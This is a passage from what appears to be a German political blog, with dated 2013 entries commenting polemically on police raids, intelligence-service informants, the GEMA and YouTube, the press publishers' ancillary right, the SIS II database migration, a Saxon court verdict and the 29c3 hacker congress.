Mit anderen Worten: die wollen wissen, wie weit sie gehen können, ohne Proteste zu triggern.
Auch im Umfeld von S-21 und bei der Energiemafia gibt es solche Studien zuhauf. Und die Dienste und das Militär interessieren sich natürlich für Hacker und werden da auch lieber "Wissenschaftler" vorschicken.
Das Göttinger Institut für Demokratieforschung betont vor allem, dass BP keinen Einfluss auf die Methodik genommen habe. Dass die Ergebnisse also wissenschaftlich verwertbar sind. Dass sie da für den Imperator die Rebellen ausgekundschaftet haben, das ist noch nicht Teil von deren Problembewusstsein.
Update: Passt auch in den Dunstkreis: RWE-Studie "Akzeptanz braucht Bürgerbeteiligung".
Update: Siehe auch: Hochschulwatch, sammelt Drittmittelstatistiken der Hochschulen.
Update: Zum Kontrast: Wie BP mit Whistleblowern umgeht.

Wed Feb 6 2013

[l] Die Polizei macht eine Hausdurchsuchung bei der Punkband "NORMAHL", wegen ihres Songs "Haut die Bullen platt wie Stullen". Der Song ist 30 Jahre alt. Naja, äh, so eine polizeiliche Ermittlung muss ja auch ordentlich gemacht werden, das braucht halt seine Zeit!1!!
Immerhin, „man muss fairerweise sagen“, dass den Polizisten ihr Job „sichtlich peinlich“ gewesen sei. „Wild gewütet wurde nicht“.

Tue Feb 5 2013

[l] 54 Länder haben freiwillig mit dem Folterknast-Entführungsprogramm der CIA mitgemacht.
A 213-page report compiled by the Open Society Justice Initiative (OSJI), a New York-based human rights organisation, says that at least 54 countries co-operated with the global kidnap, detention and torture operation that was mounted after 9/11, many of them in Europe.
Schlimmer noch:
So widespread and extensive was the participation of governments across the world that it is now clear the CIA could not have operated its programme without their support, according to the OSJI.
Damit ist klar, dass die Bürger dieser Länder (zu denen ja auch Deutschland gehört) keine moralische Grundlage haben, sich über Menschenrechtsverletzungen unter Bush oder Obama zu echauffieren.

Sun Feb 3 2013

[l] Bug des Tages: OS X Texteditor. Man gibt
```
File:///
```
ein und er crasht.
Update: Nachdem mir gefühlte 300 Leute gemailt haben, dass das nicht nur der Texteditor ist: ja, weiß ich, steht in dem verlinkten Artikel. Und das in dem Artikel zu sehen, das hat euren Spaß an diesem Bug noch mal vergrößert, oder nicht? 100 Medienkompetenzpunkte für alle :-)

Fri Feb 1 2013

[l] Was passiert eigentlich bei so Treffen zwischen Nazis und "Verfassungsschutz"? Normalerweise erfährt man das ja nicht, aber jetzt gibt es eine schöne Gelegenheit, denn das BKA hat 2007 eine Hausdurchsuchung bei einem Nazi gemacht und dort Tonbänder gefunden, auf denen sich der Durchsuchte mit einem V-Mann über die Dienste unterhält. Die Ergebnisse erfüllen alle Vorurteile.
Man habe ihm damals "Antifazeitungen" mitgebracht, die der Neonazi-Szene nicht zugänglich gewesen seien und ihm angeboten, noch mehr solches Material zu liefern, antwortet Brandt.
Das ist ja wohl der Hammer! WTF? Die Dienste haben V-Männer dafür bezahlt, dass sie Material für die kursierenden Mordlisten in die rechte Extremistenszene einbringen? Wo ist da der materielle Unterschied dazu, selbst einen Auftragsmörder loszuschicken?
Was war da der Gedanke? Wenn die Nazis die Kommunisten umbringen, haben wir ein Problem weniger? Und wenn es gut läuft können wir danach die Nazis verhaften und haben einen Win-Win? Boah ist das alles widerlich. Was war noch gleich die unglaubwürdige Ausrede, wieso die Verfassungsschutzämter noch nicht geschlossen wurden?

Thu Jan 31 2013

[l] Mehr Infrastrukturapokalypse aus Berlin: Am S-Bahnhof Ostkreuz hat sich ein Stahlträger gelockert und droht abzustürzen. Sie vermuten, der Wind habe den Stahlträger gelockert. Äh, bitte was? Aus was werden denn heutzutage Stahlträger hergestellt? Watte? Hohlplastik?!
Erinnert an den Hauptbahnhof, da lockerte sich ja auch ein Strukturelement, von dem sich dann rausstellte, dass das niemand festgemacht hatte, weil das ja schwer genug sei um schon nicht wegzufliegen.
Haben die das Bauen mit Stahlelementen seit dem Eiffelturm verlernt? Oder ist das jetzt das neue Markenzeichen der Bahn? Kein Geld für Nieten? Oder vielleicht eher "wir haben schon genug Nieten bei der Bahn in den Führungsetagen"?

Tue Jan 29 2013

[l] Die Briten wollen auch Truppen nach Mali schicken. Aber nur für:
Any further assistance is likely to be in the areas of logistics, surveillance, intelligence and transport, on top of the training already being discussed.
Also nicht zum Kämpfen. Zwei Erklärungsversuche drängen sich auf. Entweder die Briten wollen sich auch ihren Urannachschub sichern. Oder die Franzosen haben Druck gemacht, immerhin haben die ja ihre Armeen partiell zusammengelegt. Das könnte ich mir schon vorstellen, dass die den Briten erklärt haben, dass zur Kooperation gehört, dass die Briten auch gelegentlich mithelfen müssen.
[l] Das ganze Eigenlob der völlig sinn- und nutzlosen Internet-Enquete ist unerträglich. Boah wie haben wir das alles toll gemacht, endlich hat mal jemand das Internet anerkannt, von einem "Experimentierfeld der Online-Beteiligung" ist da die Rede (ach tatsächlich?)… ekelerregend. Übrig geblieben ist nichts. Die Fuzzies aus dem Internet sind erfolgreich beschäftigt worden und haben in der Zeit der alternativlosen Politik unserer ewigen Kanzlerin nicht im Wege gestanden. Mir fällt gerade genau nichts ein, wofür man diese Enquete in den Geschichtsbüchern erwähnen sollte. Eine Verschwendung von Lebenszeit und Ressourcen. Man könnte höchstens positiv bemerken, dass wir damit auch innerhalb der CDU Kräfte gebunden haben. Nicht auszudenken, was dieser Axel E. Fischer für ein Unheil hätte anrichten können, wenn er mehr Zeit gehabt hätte. Der hat ja jetzt schon so Sprüche rausgehauen wie
[…] als persönliches Fazit am Montag sagte, dass ihm "erst nach und nach [..] die Dimensionen der Veränderungen klar geworden [seien], die die Digitalisierung mit sich bringt".
Der Alfred E. Neumann (danke, atoth) der Union! Oder wie wäre es mit dem hier:
"Das Querschnittsthema Internet berührt alle gesellschaftlichen Bereiche", sagte der Kommissionsvorsitzende Axel E. Fischer (CDU/CSU).
Ich habe ja schon von Anfang an gefragt, wieso wir an einer Veranstaltung teilnehmen sollten, bei der solche Leute den Vorsitz übernehmen. Das war doch klar, dass das ein "wir hören euch doch zu"-Feigenblatt war, das der Abwehr von und nicht der Kooperation mit den Netzaktivisten dienen sollte.

Mon Jan 28 2013

[l] Schöne Visualisierung des GEMA-Youtube-Problems.
[l] Island bekommt vor Gericht recht. Es ging um deren Bankenrettung, bzw haben sie sich ja geweigert, die Banken zu retten, und stattdessen ihre Bürger gerettet. Und jetzt:
In a judgment issued in Luxembourg, the court of the European Free Trade Association, or EFTA, cleared Iceland of complaints that it violated rules governing the protection of depositors drawn up by the European Union. While Iceland is not a member of the Union, it is bound by most of its rules as a member of EFTA.
Damit ist endgültig klar, dass alle anderen Länder es völlig falsch gemacht haben. Das war ja an sich die ganze Zeit schon klar, aber jetzt haben wir es verbrieft. (Danke, Mathias)
[l] Kurze Durchsage von Berlusconi: "Es war nicht alles falsch, was Mussolini gemacht hat". Ob es die vollständige Rede irgendwo gibt? Würde mich ja schon interessieren, ob da ein Beispiel für die guten Taten von Mussolini drin ist. Vielleicht die mildtätige Spende an die katholische Kirche? Autobahnen vielleicht? :-) (Danke, Frank)

Fri Jan 25 2013

[l] Aus der beliebten Kategorie "bei UNS ist Kernkraft SICHER", heute: Briten schließen geheime Urananreicherungsanlage des Militärs. Dort hat das Militär das Uran für ihre Atombomben angereichert. Das wurde jetzt zugemacht, weil ihnen die Stahlträger wegrosten. Der Hammer ist, dass das schon im letzten Mai aufgefallen ist mit dem Rostproblem, und dann hat es bis November gedauert, bis das einmal durch die zuständigen Behörden durchgesickert ist und zu einer Ausmach-Verfügung geführt hat, und erst jetzt ist das irgendwo erwähnt worden, wo der Guardian es gefunden hat.
Wer jetzt auf ein "keine Gefahr für Mitarbeiter und Anwohner" gehofft hat, den muss ich enttäuschen. Wir reden hier vom Militär, die scheißen auf die Sicherheit von Mitarbeitern und Anwohnern. Die für die relevante Frage ist, ob sie ihren Bedarf an angereichertem Uran gedeckt kriegen. :-)
[l] In Frankreich soll angeblich ein Zug mit Uranoxid und einem gefüllten Castor entgleist sein. Ich habe von dieser Site noch nie gehört und kann die Glaubwürdigkeit nicht beurteilen.
Update: Hier ist eine Mainstreamigere Quelle. Und mir hat gerade jemand gemailt, dass diese Eichhörchen-Webseite von der Empfängerin des Balls-of-Steel-Award vor einer Weile betrieben wird. Sie hat den Award dafür gekriegt, das sie sich von einer Brücke abgeseilt hatte, um Castor zu blockieren. (Danke, Martin)

Thu Jan 24 2013

[l] In den Niederlanden rennen die Verwertungsgesellschaften rum und mahnen Webseitenbetreiber für das Einbinden von Youtube-Videos ab. Das sei eine Aufführung und dafür werden Gebühren fällig. Eine ähnliche Position würde bei uns sicher auch die GEMA vertreten, aber gibt es ja auf Youtube keine Videos mehr, weil die GEMA da lieber verbrannte Erde gemacht hat. Insofern haben wir vermutlich einmal Glück gehabt mit der GEMA im internationalen Vergleich. Auf der anderen Seite gibt es natürlich auch noch andere Dinge, die man bei sich einbinden kann, und vermutlich wird die GEMA da nicht lange zögern. Wir brauchen dringend eine Urheberrechtsreform. So geht das nicht weiter.

Fri Jan 18 2013

[l] Die Zeitungs- und Zeitschriften-Verbände haben ein LSR-Gutachten in Auftrag gegeben. Wenig überraschend erweckt es den Eindruck, nicht gänzlich ergebnisoffen produziert worden zu sein. Mir fällt als erstes dieser Abschnitt hier auf:
Außerdem wird verkannt, dass von dem Schutzumfang des Urheberrechts laut RegE mit Verweis auf die Paperboy-Entscheidung des BGH die reine Verlinkung explizit nicht erfasst ist (BT-Drs. 17/11470, S. 10). Das Gutachten geht an dieser Stelle offensichtlich von falschen Prämissen aus.
Mit anderen Worten: ICH bin Schuld am LSR. Paperboy war eine Suchmaschine für Online-Zeitungen, die ich im letzten Jahrtausend programmiert hatte. Das Handelsblatt argumentierte damals, Links auf Artikel seien verboten, das sei wie die unautorisierte Extraktion von Daten aus ihrer Datenbank, und ich müsste wenn dann auf ihre Homepage linken. Das zog sich fast 10 Jahre hin und am Ende hat der BGH entschieden, dass Links auf Artikel OK sind und nicht unter das Urheberrecht fallen. Und DAS ziehen die jetzt als Begründung aus dem Hut, wieso wir offensichtlich ein schärferes Urheberrecht brauchen. m(
Aber auch der Rest von dem Papier ist ganz großes Tennis. Schon als sie sich in der Einleitung der Frage stellen, wieso sie überhaupt eine Studie machen, wenn das Max-Planck-Institut doch schon alles gesagt hat, da kommt dieses Highlight hier:
Diese führt ausschließlich Argumente gegen ein Leistungsschutzrecht für Presseverleger auf. Um die wissenschaftliche Ausgewogenheit zu gewährleisten, sollen neben dieser Stellungnahme Argumente für ein solches Leistungsschutzrecht genannt werden.
Die bitte was? Die "wissenschaftliche Ausgewogenheit"?!? Komisch, das muss man mir damals falsch erklärt haben in der Schule. Ich dachte immer, bei der Wissenschaft ginge es um Fakten und Wahrheitsfindung, nicht um Ausgewogenheit und Berücksichtigung der Gefühle von irgendwelchen verstrahlten Randgruppen. Machen wir als nächstes auch für die wissenschaftliche Ausgewogenheit eine Studie über die Vorteile von Kreationismus? Wissenschaftliche Ausgewogenheit! Ich glaub mein Schwein pfeift! Fair and Balanced, ja? Mann Mann Mann.
Inhaltlich zitiert der Autor sich dann selbst und findet es nicht begründenswert, wieso die Verleger überhaupt ein Recht brauchen. Die hätten die Verwertungskette immer in der Hand gehabt, daher habe es so ein Recht bisher nicht gebraucht. Aber jetzt braucht man es, da den Verlegern die Verwertungskette aus der Hand gleitet. Wieso die Verleger überhaupt Teil der Verwertungskette sein sollten, den Aspekt finden sie nicht begründenswert.
Noch am ehrlichsten ist dieser Teil hier:
Die Verlage erhalten von den freien Autoren aber zumeist keine ausschließlichen Nutzungsrechte, sondern nur einfache Nutzungsrechte, wie sie der Regelfall nach § 38 Abs. 3 UrhG sind. Den Verlagen fehlt somit ein eigenes Recht, um Paid content rechtssicher einführen zu können.
Die Verlage haben sich hier durch die Auslagerung der Arbeit an Freiberufler komplett ihre Arbeitsgrundlage zersägt und heulen jetzt rum, dass die Freiberufler sich nicht auch die letzten Rechte noch abschwatzen lassen. Tja, die habt ihr wohl einmal zu oft verarscht, lieber Verleger. So ist das halt, wenn man seine Mitarbeiter wie Scheiße behandelt. Dann sind die auch nicht mehr lieb zu euch.
Oh apropos wissenschaftliche Ausgewogenheit. Das Papier erwähnt komischerweise auch nicht, dass unsere Kopierschutzumgehungsgesetzgebung schon so dermaßen im Arsch ist, dass sie sich ein Analogon zum LSR technisch selbst basteln könnten.
Update: Oh übrigens, der Autor dieser Studie betreibt ansonsten eine Lobbygruppe und hat auch ein Gutachten für 2-Strikes gemacht.
[l] Habt ihr schon gehört? Der BR stellt Space Night ein! Ein herber Verlust für alle Nerds, die sich neben ihre abendliche Projekte eine Glotze mit Space Night gestellt haben, weil das so schön entspannt.
Jetzt wollt ihr sicher auch noch wissen, wer an der Einstellung Schuld ist. Die GEMA ist Schuld. So langsam sieht das aus als ob sich GEMA und katholische Kirche ein Rennen um den Platz 1 der verhasstesten Organisationen liefern. Beide sind inzwischen unbeliebter als Gerichtsvollzieher und Banker.
Ich hatte ja gehofft, dass die sich gegenseitig plattmachen, als die GEMA die Martinsumzüge angriff. Aber eine Krähe hackt der anderen Krähe kein Auge aus? Oder Ganovenehre? Irgendwie hat das nicht zu dem Krieg geführt, den ich mir da gewünscht hätte. Das hätte jedenfalls nur Gewinner gegeben.

Thu Jan 17 2013

[l] 22 Monate Haft ohne Bewährung für Megafon-Ansagen von Tim H aus Berlin. Nanu, die Berliner Justiz leistet sich ja schon den einen oder anderen Ausfall, aber das ist doch uncharakteristisch hart. Auflösung: War natürlich Sachsen, nicht Berlin. Es ging um eine Anti-Nazi-Demo in Dresden. Aber hey, inzwischen sollte sich das doch herumgesprochen haben. In Sachsen gründet man besser eine rechtsradikale Burschenschaft als eine Antifa. Dann wird man vom Staat via V-Leuten subventioniert und nicht verfolgt.
Die Details sind mal wieder herzallerliebst an dem Fall. Beweise gegen den Mann gibt es nämlich keine. Wiedererkannt haben sie ihn über seine Körpergröße. Und so recht vorzuwerfen hatten sie ihm auch nichts, also wurde daraus nur das übliche Gummiparagraphentum mit Rädelsführerschaft und schwerem Landfriedensbruch. Die Anwälte meinten wohl auch gleich, naja, das ist Sachsen, da hatten wir in den unteren Instanzen eh nichts erwartet. Wer sich übrigens denkt, dass das in Sachsen nur die Justiz betrifft, der kann sich ja mal diese "fair and balanced" Berichterstattung in der Lokalpresse durchlesen. Da liest sich das schon gleich so, als sei dem Mann nachgewiesen worden, dass er Polizisten als "Nazischweine" betitelt habe. Den besonders aparten letzten Absatz möchte ich an dieser Stelle besonders würdigen. Beweisstück A gegen den Freistaat Sachsen:
Tim H., der aus der Antifa-Szene stammt und seit März 2011 in der Linkspartei-Zentrale angestellt ist, hatte in dem viertägigen Prozess keine Angaben gemacht. Richter Hlavka sagte, er könne daher keine Aussage zum Verhalten des Angeklagten und wie er zur Gewalt steht machen. „Ich kann Ihnen keine günstige Sozialprognose ausstellen“, sagte Hlavka. Daher gab es keine Bewährung mehr.
Die Begründung dafür, dass das nicht auf Bewährung ausgesetzt wurde, ist also dass der von seinem Zeugnisverweigerungsrecht Gebrauch gemacht hat. Un-fass-bar. Wieso ist Sachsen noch nicht aus dem Bund geflogen, bis sie Rechtsstaat einführen und Menschenrechte anerkennen?
Oh und als ich gerade am Rumblättern war in der Sächsischen Zeitung: Die Staatsanwaltschaft hat sich das nächste Opfer aus der Opposition ausgesucht, den sie jetzt versenken wollen. Diesmal Grüne und nicht Linke, aber hey, alles dasselbe. Wer nicht CDU ist, ist linke Zecke und gehört bekämpft!1!!
Update: Auch der Spiegel ist irritiert und bringt dieses tolle Zitat:
"Was andere getan haben, müssen Sie sich mit anrechnen lassen", sagte der Vorsitzende in seiner Urteilsbegründung und stellte sich auch in diesem Punkt hinter die Staatsanwaltschaft, die bereits in der Anklageschrift hervorhob, dass Tim H. selbst keine Gegenstände geworfen oder Polizeibeamte angegriffen habe. "Doch werden ihm die 'Treffer' und Tritte anderer Mitglieder aus der Gruppe gemäß §25 Abs. 2 StGB zuzurechnen sein."
Eine Schande.
Update: Oh ach na sowas! Schaut mal, was der Lichdi so über den Sachsensumpf publiziert hat. Das ist der, dessen Immunität die Staatsanwaltschaft jetzt aufheben will. Na das passt ja mal wieder alles wie Arsch auf Eimer! Auch seine Stellungnahme zur Immunitäts-Aufhebung ist sehr lesenswert.
Ich möchte mich als Mitglied des Landtags nicht vor Strafverfolgung schützen lassen, wenn sich über 351 engagierte Bürgerinnen und Bürger dieser seit zwei Jahren stellen mussten und müssen.
[l] Reuters berichtet, dass ein US-Kraftwerk für drei Wochen ausgeschaltet bleiben musste, nachdem ein Computervirus ein Turbinenkontrollsystem plattgemacht hatte. Der Virus kam über einen infizierten USB-Stick in das System.
Endlich haben auch die USA ihr digitales Pearl Harbor, ihr Internet-9/11, ihren Vorwand für mehr Investitionen in "Cyberwar-Abwehr"! Der Geldregen war den zuständigen Organisationen offensichtlich das Verbrennen von einem ihrer Würmer wert.
[l] Mir hat gerade ein Vögelchen eine großartige Geschichte zugesteckt. Es geht um die Umstellung von SIS+ auf SIS II, das ist das "Schengen Information System", das EU-weite Polizei-Datenbank-Verbundnetz. Die Umstellung war eines dieser tollen IT-Großprojekte der öffentlichen Hand, die dann im Industriemaßstab verkackt werden. Einen richtigen Überblick, was da alles falsch lief, gibt es bisher m.W. noch nicht öffentlich, auch ich habe hier nur ein paar Krumen zugesteckt bekommen. Aber schon dort stehen Dinge drin wie dass sie die Netz-Verbindungen überhaupt noch nicht abnehmen konnten, weil es dafür drei Monate am Stück störungsfrei verfügbar sein muss, was der Zulieferer nicht hinkriegt.
Der eigentliche Schenkelklopfer in diesem Leak ist allerdings die Konvertierungssoftware zwischen den Datenbankformaten von "SIS 1+" (der bisherigen Software) und "SIS II" (der neuen Software). Da geht es erstmal so los, dass sie einen Test mit Rückfall auf die alte Software getestet haben, und direkt nach dieser Generalprobe hat die Netzwerkabteilung an der Netzwerkkonfiguration rumgepopelt, so dass sie jetzt nochmal testen müssen.
Bei dem Konvertierer fallen dann so Details auf wie dass es nur im neuen System eine ID-Nummer für jeden Datensatz gibt und daher können Mitgliedstaaten mit der alten Software nicht sagen, welcher Datensatz ihnen konkret fehlt, sondern nur dass einer fehlt. Wir reden hier technisch von einer replizierten Datenbank, bei der das Update vom Hinzufügen eines Datensatzes verlorengegangen ist. Aber aus unklaren Gründen nehmen sie da keine Lösung von der Stange (denn das ist ein gelöstes Problem) sondern basteln sich ein eigenes Fummelsystem mit Benachrichtigungen und auf Basis von unzureichenden Datenbankmodellen. Die zuständige Abteilung meint laut dieses Dokumentes, naja, es gibt da eine ordentliche Lösung, aber für die fehlen uns die Resourcen, daher schicken wir am besten alle vier Stunden manuell per Email über das interne Netzwerk Listen mit den nicht konvertierten Datensätzen rum. Auf dem Niveau arbeiten die da!
An der Stelle merkte der Österreichische Unterhändler an, dass es sich hier um wesentliche Informationen handele, die zeitnah überall zur Verfügung stehen müssten. Der Deutsche Unterhändler konnte gar nicht erst glauben, dass der Konverter überhaupt Nachrichten verliert. Man sei davon ausgegangen, dass dafür die Tests gemacht wurden, damit man ausschließen kann, dass da Datensätze verloren gehen. Und überhaupt, von wievielen Datensätzen reden wir hier eigentlich, die da so pro Tag verloren gehen?
Die erste Antwort kommt von der Sachverständigenfirma; die sagen, naja, das kann man so genau nicht sagen, weil wir ja bisher nur mit Testdaten gearbeitet haben und nicht mit echten Daten. Daraufhin unterbricht die Netzwerkabteilung und sagt, das sei ja gar nicht so schlimm wie es klingt, weil es sich höchstens um 4-10 Nachrichten am Tag handele.
Wartet, kommt noch besser!
Zuständig ist in der aktuellen Projektphase Estland, und die gaben da ernsthaft zu Protokoll, dass das aus Sicht von Estland schon OK sei, das Risiko sei hinreichend abgefedert, denn ein gewisses Lebensrisiko gibt es ja immer. Es könne schließlich auch morgen ein Meteorit das Rechenzentrum treffen, und dann wäre ja auch alles futsch.
Leider kann ich das nicht unabhängig validieren oder die Quelle sagen, daher betrachtet das mal als Gerücht, bis das noch woanders leakt :-)

Wed Jan 16 2013

[l] Solange die EU-Kommission im Amt ist, werden die weiter Flurschaden machen. Aktuell: Wasserversorgung europaweit privatisieren!1!!
Diese ganze Institution hat nichts als Mist gemacht in der Zeit ihrer Existenz. Die muss weg.
[l] Manchmal steckt hinter einem fiesen chinesischen VPN-Zugriff auch bloß Telearbeit.
As it turns out, Bob had simply outsourced his own job to a Chinese consulting firm. Bob spent less that one fifth of his six-figure salary for a Chinese firm to do his job for him. Authentication was no problem, he physically FedExed his RSA token to China
Noch cooler: der hat das anscheinend nicht nur mit einer Firma so gemacht. Bonus: seine Performancereviews waren besser als die aller anderen Programmierer in dem Gebäude.
Update: The Onion hat das schon 2009 genau so vorhergesagt.
Update: Dilbert ist auch immer wieder passend zu Outsourcing.
Update: Dieses ranzige Verizon-Blog ist jetzt seit Stunden offline. Einmal mit Profis arbeiten. Alternative Quelle.

Tue Jan 15 2013

[l] Wo wir gerade bei den Piraten waren: Das Netz wird da offensichtlich von alten Männern aus der "Class-B-Netz"-Zeit gemacht. Money Quote:
Nebenbei stellte sich auch heraus, warum Ping komplett gesperrt und ICMP rate-limited ist: "Es geht keinen etwas an, welche IP Adressen wir in Verwendung haben".
Ja nee, ist klar.

Mon Jan 14 2013

[l] Bei der Berliner Polizei sind V-Mann-Unterlagen zu den NSU-Morden verschwunden. Die Dokumente waren nicht zentral im Archiv oder auf einem Server sondern auf dem Laptop eines Kriminalbeamten. Das war, wie bei der Polizei üblich, nicht von denen angeschafft worden sondern irgendwann mal von jemandem beschlagnahmt worden. Backups hat keiner gemacht und jetzt sind sie halt weg.

Fri Jan 11 2013

[l] Wie integriert man eigentlich Flüchtlingskinder? Die sind teilweise schon Teenager, aber kenne das Konzept "Schule" nicht. Lesen, Schreiben, Stift halten: Fehlanzeige. Wenn man die einfach so in eine normale Schule steckt, wird das offensichtlich ein Desaster. Daher gibt es in Berlin ein spezielles Konzept, bei dem Lehrer eine Art Dorfschule bei den Flüchtlingen machen. Das ist so ein Erfolgsmodell, dass der Rektor einen Integrationspreis für seine Arbeit gekriegt hat.
Aber das wird jetzt zugemacht. Weil sich der Flüchtlingsrat eingeschaltet hat, und der findet das doof. Begründung:
Aus prinzipiellen Gründen, um nicht einigen Kindern einen Sonderstatus einzuräumen.
Und so herrscht jetzt endlich wieder Gerechtigkeit für Flüchtlingskinder und sie haben alle schlechte Karten. Tolle Arbeit, lieber Flüchtlingsrat.
Das generelle Problem mit Flüchtlingskindern ist in diesem Artikel beschrieben. Zitat:
»Als LINKE lehnen wir es kategorisch ab, Flüchtlingskinder aus den Schulen auszusperren und sie stattdessen in Asylbewerberheimen separat zu unterrichten.« Das geschehe etwa in Spandau und Marienfelde und sei »Unterricht zweiter Klasse«.
Das hätten sie vielleicht vorher mal im Einzelfall prüfen sollen, in welchem Fall das tatsächlich Unterricht zweiter Klasse ist.

Thu Jan 10 2013

[l] Die Gema droht jetzt Google juristisch, weil Youtube die Schuld für fehlende Videos immer auf die Gema schiebt. Da gehört sie natürlich auch hin, aber die Gema findet jetzt, der Text sehe so aus, als sei die Gema nicht an einer Lösung interessiert, und das stimme nicht. Nun, äh, WER DENN SONST, Gema? Eine derartige Dickköpfigkeit und Realitätsverleugnung haben wir zuletzt im Politbüro des ZK der SED gesehen, und selbst die haben irgendwann gemerkt, dass es Diskrepanzen zwischen ihrer Selbstwahrnehmung und der Realität gibt. Wollt ihr euch nicht mal auch an diesem Teil von deren Verhalten ein Vorbild nehmen?
Oh, es sei auch noch auf das Detail verwiesen, wo die Schiedsstelle sitzt, die die Gema anrufen will. Beim Patentamt. Genau die Richtigen für eine unabhängige Entscheidung, ob willkürliche Rechte an Immaterialgütern gut oder schlecht sind!

Wed Jan 9 2013

[l] Gute Nachrichten: Der NSU wurde aufgelöst. Das hat ein Richter des OLG München erklärt. Ich wusste gar nicht, dass das eine Option ist, dass das einfach ein Richter ansagt. Wieso haben sie das nicht vor der Verhaftung schon gemacht? Oder damals bei der RAF?

Tue Jan 8 2013

[l] Ich habe mir gestern erklären lassen, wie das mit dem BER-Untersuchungsausschuss funktioniert. Ich hatte mich ja schon die ganze Zeit gefragt, warum die so einen Ausschuss überhaupt zustande kommen lassen, da ist doch offensichtlich niemand an Aufklärung oder gar Trockenlegung des Sumpfes interessiert.
Übrigens, am Rande. Ratet mal, wann BER ursprünglich fertig sein sollte. Na? Wowereit sagte 2001, dass BER 2007 fertig sei. Grund war, dass der Flughafen Tempelhof zugemacht werden sollte, und Wowereit versprechen musste, dass bis dahin der andere Flughafen fertig sein würde.
Aber zurück zum Untersuchungsausschuss. Da haben sich gerade die ganze Schuldigen reihum angezeigt. Die Polizei "ermittelt" jetzt, natürlich ohne Ergebnis, weil alle die Aussage verweigern und sich an nichts mehr erinnern können. Und vor dem Untersuchungsausschuss können die dann mit Hinweis auf das laufende Verfahren auch die Aussage verweigern.
Die beste Demokratie, die man für Geld kaufen kann!

Wed Jan 2 2013

[l] Nachdem der 29c3 vorbei ist und sich dieser Creepercard-Kram nun doch leider langsam ins Netz ergießt, möchte ich auch ein paar Punkte zu Protokoll geben. Erstens: der Congress war großartig, es war ein Riesenspaß, da waren lauter nette, freundliche, interessante und interessierte Leute und ich habe schöne Dinge gesehen und gelernt, spannende Gespräche geführt und meinen Horizont erweitert. Leider haben ein paar Schreihälse (Gerüchten zufolge als "jetzt werden wir diese Hacker aber mal so richtig vorführen"-Reaktion auf die voll nach hinten losgegangene C-Base-Klotür-Sache) die Außenwahrnehmung des 29c3 beschmutzt; als Veranstaltung, wo sich Frauen nur in Begleitung von schwerbewaffneten Bodyguards wagen können, weil sie sonst schon beim Einparken mit Übergriffen rechnen müssten. Das tut schon mir weh, der ich nur Vortragender und Mitglied bin. Wie muss sich erst jemand fühlen, der ein halbes Jahr seines Lebens in die Organisation investiert hat? Ungefähr so wie ihr euch das jetzt vermutlich vorstellen könnt, ich habe auf dem Congress persönlich ein paar Stunden mit Deeskalation verbracht. Und die unbesungenen Organisatoren des Kongresses waren auch die einzigen echten Opfer dieser ganzen Angelegenheit, denn tatsächliche physische Übergriffe gab es keine, jedenfalls wurde dem Awarenessteam keiner gemeldet.
Awarenessteam? Ja, wir hatten ein Awarenessteam. Das A-Team war mit 8 Teilnehmern sehr großzügig besetzt, wenn man bedenkt, dass es aus Sicht des Clubs keine Anzeichen dafür gab, dass es hier wirklich ein Problem gibt, und dass der Club an anderer Stelle Probleme hatte, genügend viele Freiwillige zu finden, um alle nötigen Aufgaben während des Kongresses erledigen zu können. Es gab auch mehrere Gender-Vorträge im Programm, das ist unter Hackerkonferenzen ein Alleinstellungsmerkmal. In einem Programm, das sich dann auch prompt als "hat zu wenig Tech-Talks" beschimpfen lassen musste.
Ich muss ein bisschen ausholen, um das Mimimi zu rechtfertigen, was gleich kommt. In der Berichterstattung über den 29c3 gab es den schönen Satz, dass die Hamburger Behörden das Konfliktpotential beim 29c3 geringer als bei einem Kirchentag einschätzen. Das würde ich sogar noch drastischer formulieren wollen. Wenn man auf dem Congress eine kaputte Fernbedienung irgendwo liegen lässt, wird die nicht nur nicht geklaut, sondern mit einer gewissen Wahrscheinlichkeit hat sie der Finder auch gleich noch repariert. Ein Kumpel hat auf dem Camp sein Auto abzuschließen vergessen. Das stand da ein paar Tage unabgeschlossen rum. Niemand hat es geklaut, auch das Autoradio war noch da. Nach dem Camp fuhr er in die Innenstadt, parkte, schloss ab, ging kurz was essen, kam zurück, da war das Auto aufgebrochen und der Inhalt geklaut. Hacker sind zwar manchmal sozial gestört, introvertiert, werden in der Schule gemobbt, aber gerade das sorgt dafür, dass sie Respekt vor der Privat- und Intimsphäre Anderer haben und nicht übergriffig werden. Gibt es Ausnahmen? Bestimmt. Außerdem kommen zu so einer Massenveranstaltung ja nicht nur Hacker. Und wir machen ja am Eingang keine Gesinnungskontrolle mit Lügendetektor. Und dann gibt es da noch den Einfluss von Alkohol und anderen Drogen.
Der Congress ist ein Community-Event. Das ist kein "die Orga macht und ihr konsumiert". Die Vorträge kommen aus der Community, die Helfer kommen aus der Community, die Orga rekrutiert sich aus der Community, sogar die Auswahl der Vorträge ist ein Community-Ding. Wer etwas auf dem Congress haben möchte, der bringt die nötigen Teile mit und macht es einfach. "Die Orga" schafft die nötige Infrastruktur (Strom, Licht, Wasser, Internet, Platz, Blog, Wiki), den Rest machen die Teilnehmer selbst. In diesem Kontext muss man sich die Bestürzung des A-Teams vorstellen, als der erste Konfliktpunkt war, dass jemand im Wiki eine Seite mit sexistischem Dummschwall hinterlassen hatte. Und das war jetzt nicht mal Kram, der Argumente hatte, und möglicherweise Schaden anrichten kann, weil er Leute umstimmen könnte, sondern offensichtlicher Vandalismus. Das ist ein Wiki. Die korrekte Reaktion wäre gewesen: Dummschwall löschen. Der Edit-Button ist auf der Seite selbst. Klicken, Text rausnehmen, Submit klicken, fertig. Ein Dutzend Menschen haben sich auf Twitter über diese Seite empört. Niemand hat den Edit-Button gefunden. Und keiner rief bei der Hotline an.
